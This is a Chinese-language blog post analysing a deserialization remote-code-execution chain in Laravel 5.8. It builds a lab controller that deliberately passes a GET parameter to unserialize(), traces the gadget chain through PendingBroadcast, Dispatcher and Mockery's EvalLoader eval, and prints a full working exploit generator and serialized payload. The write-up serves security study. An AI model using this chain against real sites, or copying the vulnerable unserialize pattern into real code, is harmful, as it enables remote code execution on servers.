Laravel 5.8 RCE 分析
原帖地址 : https://xz.aliyun.com/t/6059
Laravel 代码审计
环境搭建
composer create-project --prefer-dist laravel/laravel laravel58安装 Laravel 5.8 并生成laravel58项目进入项目文件夹,使用
php artisan serve启动 web 服务在
laravel58/routes/web.php文件添加路由Route::get("/","\App\Http\Controllers\DemoController@demo");
在
laravel58/app/Http/Controllers/下添加DemoController.php控制器<?php
namespace App\Http\Controllers; class DemoController extends Controller
{
public function demo()
{
if(isset($_GET['c'])){
$code = $_GET['c'];
unserialize($code);
}
else{
highlight_file(__FILE__);
}
return "Welcome to laravel5.8";
}
}
漏洞分析
ph 牛的 payload : https://github.com/ambionics/phpggc/pull/61
从
Illuminate\Broadcasting\PendingBroadcast类的__destruct方法开始的 pop 链Illuminate\Broadcasting\PendingBroadcast中,$events必须实现Dispatcher接口,这里选择的是Illuminate\Bus\Dispatcherpublic function __construct(Dispatcher $events, $event)
{
$this->event = $event;
$this->events = $events;
} public function __destruct()
{
$this->events->dispatch($this->event);
}
Illuminate\Bus\Dispatcher中,调用dispatch方法,进入if判断,$this->queueResolver是在实例化Illuminate\Bus\Dispatcher时的一个参数,它必须有值,$command也就是$this->event必须实现ShouldQueue接口,这里选择的就是Illuminate\Broadcasting\BroadcastEvent// $command : $this->event
public function dispatch($command)
{
if ($this->queueResolver && $this->commandShouldBeQueued($command)) {
return $this->dispatchToQueue($command);
} return $this->dispatchNow($command);
} public function __construct(Container $container, Closure $queueResolver = null)
{
$this->container = $container;
$this->queueResolver = $queueResolver;
$this->pipeline = new Pipeline($container);
} protected function commandShouldBeQueued($command)
{
return $command instanceof ShouldQueue;
}
到这里,构造出的 exp :
<?php
namespace Illuminate\Broadcasting {
class PendingBroadcast {
protected $events;
protected $event;
function __construct($evilCode)
{
$this->events = new \Illuminate\Bus\Dispatcher();
$this->event = new BroadcastEvent($evilCode);
}
}
}
?>
然后进入
dispatchToQueue方法,存在call_user_func方法,其中的$this->queueResolver是可控的,这里利用的是Mockery\Loader\EvalLoader的load方法,即$this->queueResolver为array(new Mockery\Loader\EvalLoader(), "load")public function dispatchToQueue($command)
{
$connection = $command->connection ?? null; $queue = call_user_func($this->queueResolver, $connection); if (! $queue instanceof Queue) {
throw new RuntimeException('Queue resolver did not return a Queue implementation.');
} if (method_exists($command, 'queue')) {
return $command->queue($queue, $command);
} return $this->pushCommandToQueue($queue, $command);
}
这个点的意思就是
$this->events调用dispatch传入参数$this->event后- 访问
$this->events的queueResolver属性 - 调用
$this->events->commandShouldBeQueued($this->event)方法 - 调用
dispatchToQueue传入$this->event参数。其中的$connection为$this->event->connection,即Illuminate\Broadcasting\BroadcastEvent中的$connection属性 call_user_func将$connection作为参数传给$this->queueResolver返回的函数
到这里,构造出的 exp 如下,已经实现
call_user_func($this->queueResolver, $connection)即call_user_func($evilFunc, $evilCode),接下来就要寻找一个可以利用的函数,这里选择的是Mockery\Loader\EvalLoader,继续跟进<?php
namespace Illuminate\Broadcasting {
class PendingBroadcast {
protected $events;
protected $event;
function __construct($evilCode)
{
$this->events = new \Illuminate\Bus\Dispatcher();
$this->event = new BroadcastEvent($evilCode);
}
} class BroadcastEvent {
public $connection;
function __construct($evilCode)
{
$this->connection = $evilCode;
}
}
} namespace Illuminate\Bus {
class Dispatcher {
protected $queueResolver;
function __construct()
{
$this->queueResolver = $evilFunc;
}
}
}
Mockery\Loader\EvalLoader中有一个eval函数可以利用,这里的$definition是MockDefinition类的实例化对象,也就说明$this->event->connection是MockDefinition类的实例化对象。接下来就是绕过if判断。class EvalLoader implements Loader
{
public function load(MockDefinition $definition)
{
if (class_exists($definition->getClassName(), false)) {
return;
} eval("?>" . $definition->getCode());
}
}
跟进
Mockery\Generator\MockDefinition,如果要绕过if判断,必须让getClassName返回一个不存在的类名,即$this->config->getName()返回一个不存在的类名。$config为Mockery\Generator\MockConfiguration的实例化对象class MockDefinition
{
protected $config;
protected $code; public function __construct(MockConfiguration $config, $code)
{
if (!$config->getName()) {
throw new \InvalidArgumentException("MockConfiguration must contain a name");
}
$this->config = $config;
$this->code = $code;
} public function getConfig()
{
return $this->config;
} public function getClassName()
{
return $this->config->getName();
} public function getCode()
{
return $this->code;
}
}
Mockery\Generator\MockConfiguration中,让getName()返回一个不存在的类名,最终执行eval("?>" . $definition->getCode());实现 RCEclass MockConfiguration
{
protected $name; public function getName()
{
return $this->name;
}
}
最终的 exp ,(ph 牛的 exp ) :
<?php
namespace Illuminate\Broadcasting {
class PendingBroadcast {
protected $events;
protected $event;
function __construct($evilCode)
{
$this->events = new \Illuminate\Bus\Dispatcher();
$this->event = new BroadcastEvent($evilCode);
}
} class BroadcastEvent {
public $connection;
function __construct($evilCode)
{
$this->connection = new \Mockery\Generator\MockDefinition($evilCode);
}
}
} namespace Illuminate\Bus {
class Dispatcher {
protected $queueResolver;
function __construct()
{
$this->queueResolver = [new \Mockery\Loader\EvalLoader(), 'load'];
}
}
} namespace Mockery\Loader {
class EvalLoader {}
}
namespace Mockery\Generator {
class MockDefinition {
protected $config;
protected $code;
function __construct($evilCode)
{
$this->code = $evilCode;
$this->config = new MockConfiguration();
}
}
class MockConfiguration {
protected $name = 'abcdefg';
}
} namespace {
$code = "<?php phpinfo(); exit; ?>";
$exp = new \Illuminate\Broadcasting\PendingBroadcast($code);
echo serialize($exp);
}
?>
构造输出结果 :
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{S:9:"\00*\00events";O:25:"Illuminate\Bus\Dispatcher":1:{S:16:"\00*\00queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;S:4:"load";}}S:8:"\00*\00event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{S:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{S:9:"\00*\00config";O:35:"Mockery\Generator\MockConfiguration":1:{S:7:"\00*\00name";S:7:"abcdefg";}S:7:"\00*\00code";S:25:"<?php phpinfo(); exit; ?>";}}}
一些思考
危险函数的寻找
eval,call_user_func
phpstorm + xdebug 调试代码
PHP 序列化的时候 private 和 protected 变量会引入不可见字符
\x00,\00Test\00y为 private,\00*\00为 protected,注意这两个\x00就是 ascii 码为 0 的字符。这个字符显示和输出可能看不到,甚至导致截断,url 编码后就可以看得很清楚了。此时,为了更加方便进行反序列化 payload 的传输与显示,我们可以在序列化内容中用大写 S 表示字符串,此时这个字符串就支持将后面的字符串用 16 进制表示。<?php
class Test
{
public $x="peri0d";
private $y="peri0d";
protected $z="peri0d";
} $k = new Test(); echo serialize($k); // O:4:"Test":3:{S:1:"x";S:6:"peri0d";S:7:"\00Test\00y";S:6:"peri0d";S:4:"\00*\00z";S:6:"peri0d";}
?>
反序列化测试代码 :
<?php
// 环境 : php 7.1.13 nts
class Test
{
public $x="peri0d";
private $y="peri0d";
protected $z="peri0d";
} $n = new Test();
var_dump(serialize($n));
var_dump(unserialize(serialize($n))); // 成功 $k = 'O:4:"Test":3:{S:1:"x";S:6:"peri0d";S:7:"\00Test\00y";S:6:"peri0d";S:4:"\00*\00z";S:6:"peri0d";}';
var_dump(unserialize($k)); // 成功 $m = 'O:4:"Test":3:{s:1:"x";s:6:"peri0d";s:7:"\00Test\00y";s:6:"peri0d";s:4:"\00*\00z";s:6:"peri0d";}';
var_dump(unserialize($m)); // 失败 $l = 'O:4:"Test":3:{s:1:"x";s:6:"peri0d";s:7:"Testy";s:6:"peri0d";s:4:"*z";s:6:"peri0d";}';
var_dump(unserialize($l)); // 失败
?>
参考链接
Laravel 5.8 RCE 分析的更多相关文章
- laravel中间件源码分析
laravel中间件源码分析 在laravel5.2中,HTTP 中间件为过滤访问你的应用的 HTTP 请求提供了一个方便的机制.在处理逻辑之前,会通过中间件,且只有通过了中间件才会继续执行逻辑代码. ...
- laravel框架源码分析(一)自动加载
一.前言 使用php已有好几年,laravel的使用也是有好长时间,但是一直对于框架源码的理解不深,原因很多,归根到底还是php基础不扎实,所以源码看起来也比较吃力.最近有时间,所以开启第5.6遍的框 ...
- CVE-2019-9081:laravel框架序列化RCE复现分析
这里贴上两篇大佬的分析的帖子 本人习惯把平常的一些笔记或者好的帖子记录在自己的博客当中,便于之后遇到同样的漏洞时快速打开思路 1.https://xz.aliyun.com/t/5510#toc-8 ...
- Laravel 5.7 RCE (CVE-2019-9081)
Laravel 代码审计 环境搭建 Laravel 5.7 文档 : https://learnku.com/docs/laravel/5.7/installation/2242 Composer 下 ...
- Laravel 获取当前 Guard 分析 —源自电商购物车的实际需求
iBrand 产品中关于购物车的需求比较复杂,我们基于 overture/laravel-shopping-cart 扩展出了更加符合电商需求的购物车包,之前有文章进行过简单的介绍: Laravel ...
- Joomla 3.4.6 RCE 分析
Joomla 3.4.6 RCE 漏洞分析,首发先知社区: https://xz.aliyun.com/t/6522 漏洞环境及利用 Joomla 3.4.6 : https://downloads. ...
- thinkphp 5.1框架利用及rce分析
前言 上个学期钻研web渗透的时候接触过几个tp的框架,但那时候还没有写blog的习惯,也没有记录下来,昨天在做ctf的时候正好碰到了一个tp的框架,想起来就复现一下 正文 进入网站,标准笑脸,老tp ...
- 【PHP】用了这么久的Laravel框架,你分析过核心架构了没
Laravel最初的设计是为了面向MVC架构的,它可以满足如事件处理.用户身份验证等各种需求.另外它还有一个由管理数据库强力支持,用于管理模块化和可扩展性代码的软件包管理器. Laravel以其简洁. ...
- CVE-2022-30190 Follina Office RCE分析【附自定义word钓鱼模板POC】
昨天看了下'Follina' MS-MSDT n-day Microsoft Office RCE 这个漏洞,修改了下chvancooten的脚本,实现可以自定义word模板,便于实战中钓鱼使用,自己 ...
随机推荐
- Web 服务器压力测试实例详解
发表于 2012-1-6 14:53 | 来自 51CTO网页 Web 服务器搭建完成上线在即,其能够承载多大的访问量,响应速度.容错能力等性能指标,所有这些是管理人员最想知道也最为担心的.如何才能 ...
- OpenCV-Python 读取显示图像 | 五
目标 在这里,你将学习如何读取图像,如何显示图像以及如何将其保存回去 你将学习以下功能:cv.imread(),cv.imshow(),cv.imwrite() (可选)你将学习如何使用Matplot ...
- TensorFlow 卷积神经网络手写数字识别数据集介绍
欢迎大家关注我们的网站和系列教程:http://www.tensorflownews.com/,学习更多的机器学习.深度学习的知识! 手写数字识别 接下来将会以 MNIST 数据集为例,使用卷积层和池 ...
- 洛谷 P2656 采蘑菇 树形DP+缩点+坑点
题目链接 https://www.luogu.com.cn/problem/P2656 分析 这其实是个一眼题(bushi 发现如果没有那个恢复系数,缩个点就完了,有恢复系数呢?你发现这个恢复系数其实 ...
- NKOJ4238 天天爱跑步(【NOIP2016 DAY1】)
问题描述 小C同学认为跑步非常有趣,于是决定制作一款叫做<天天爱跑步>的游戏.<天天爱跑步>是一个养成类游戏,需要玩家每天按时上线,完成打卡任务. 这个游戏的地图可以看作一棵包 ...
- Java 程序该怎么优化?(工具篇)
程序员:为什么程序总是那么慢?时间都花到哪里去了? 面试官:若你写的 Java 程序,出现了性能问题,该怎么去排查呢? 工欲善其事必先利其器,为你呈上一箩筐性能优化工具,必有一款满足你,废话不多说,直 ...
- Hadoop(学习·2)
Hadoop 操作步骤: 192.168.1.110-113 ...
- Zabbix监控平台
Zabbix监控平台 案例1:常用系统监控命令 案例2:部署Zabbi ...
- CSS躬行记(4)——浮动形状
CSS规范新增了一个模块:CSS Shapes,shape-outside属性属于该模块,它能影响浮动元素周边内容流的形状(即浮动形状),可接收三类值:形状盒子.函数和图像. 一.形状盒子 形状盒子( ...
- 接口请求:get、post (requests方法)
https://www.cnblogs.com/lanyinhao/p/9634742.html 比较全面 1.模块说明 requests是使用Apache2 licensed 许可证的HTTP库. ...